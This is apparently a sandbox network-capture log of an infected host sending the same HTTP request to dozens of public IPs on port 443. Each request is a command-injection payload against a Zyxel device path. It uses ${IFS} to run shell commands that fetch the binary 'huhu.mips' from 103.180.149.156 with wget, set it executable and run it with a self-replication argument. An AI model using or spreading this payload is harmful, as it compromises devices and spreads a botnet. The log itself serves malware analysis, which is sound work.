                                                        Feb 2, 2024 06:21:29.323318958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9228192.168.2.144934484.175.199.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323376894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9229192.168.2.145718635.48.18.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323415041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9230192.168.2.1444552123.136.84.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323445082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9231192.168.2.1454054168.197.98.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323497057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9232192.168.2.1439960146.229.100.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323542118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9233192.168.2.1444590137.248.209.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323575974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9234192.168.2.1434716197.180.226.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323623896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9235192.168.2.145825283.190.165.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323649883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9236192.168.2.1437988162.89.68.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323702097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9237192.168.2.145874858.254.77.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323751926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9238192.168.2.1456152157.166.44.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323776960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9239192.168.2.1448282150.133.187.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323836088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9240192.168.2.1451836106.226.147.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323865891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9241192.168.2.14568048.83.61.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323909044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9242192.168.2.1449564142.231.135.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323955059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9243192.168.2.143802045.217.221.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.323998928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9244192.168.2.1433118111.13.157.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324044943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9245192.168.2.1453056174.216.203.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324086905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9246192.168.2.144906890.56.166.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324130058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9247192.168.2.144818238.197.225.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324156046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9248192.168.2.1436462191.208.22.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324206114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9249192.168.2.144174892.131.181.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324254036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9250192.168.2.1453416106.61.110.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324290991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9251192.168.2.144386425.132.0.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324332952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9252192.168.2.1450274171.66.79.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324374914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9253192.168.2.144784457.242.41.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324409962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9254192.168.2.1451620130.121.159.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324461937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9255192.168.2.1456686139.156.168.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324532986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9256192.168.2.145240490.188.76.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324553967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9257192.168.2.14509909.157.71.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324593067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9258192.168.2.1449990178.33.60.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324634075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9259192.168.2.143538089.48.99.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324659109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9260192.168.2.143375245.231.103.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324696064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9261192.168.2.145075264.183.104.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324739933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9262192.168.2.143667460.86.181.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324805021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9263192.168.2.1434330118.56.107.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324827909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9264192.168.2.1458740179.161.26.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324872017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9265192.168.2.1442960118.217.149.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324901104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9266192.168.2.1460236118.60.216.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324928045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9267192.168.2.1450398101.40.126.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324963093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9268192.168.2.1451180148.238.51.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.324995995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9269192.168.2.1443026178.111.38.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325031042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9270192.168.2.1448862222.186.48.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325086117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9271192.168.2.145829869.16.227.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325120926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9272192.168.2.143494466.33.67.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325170040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9273192.168.2.1445774154.13.11.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325227022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9274192.168.2.1438584103.42.187.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325270891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9275192.168.2.1438874170.109.26.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325299025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9276192.168.2.1456868193.166.9.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325335979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9277192.168.2.1443806153.15.60.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325361967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9278192.168.2.143805639.38.252.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325407982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9279192.168.2.145074450.187.92.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325438023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9280192.168.2.1451952168.168.130.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325470924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9281192.168.2.1445558108.162.222.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325519085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9282192.168.2.1445144139.218.212.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325551033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9283192.168.2.146082244.13.110.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325613976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9284192.168.2.1451624173.27.76.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325642109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9285192.168.2.1448282118.112.183.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325674057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9286192.168.2.1435818169.136.158.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325730085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9287192.168.2.14604002.93.228.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325762987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9288192.168.2.145774242.218.119.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325822115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9289192.168.2.1436168139.90.100.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:29.325850010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9290192.168.2.143774054.72.116.245443
                                                        TimestampBytes transferredDirectionData
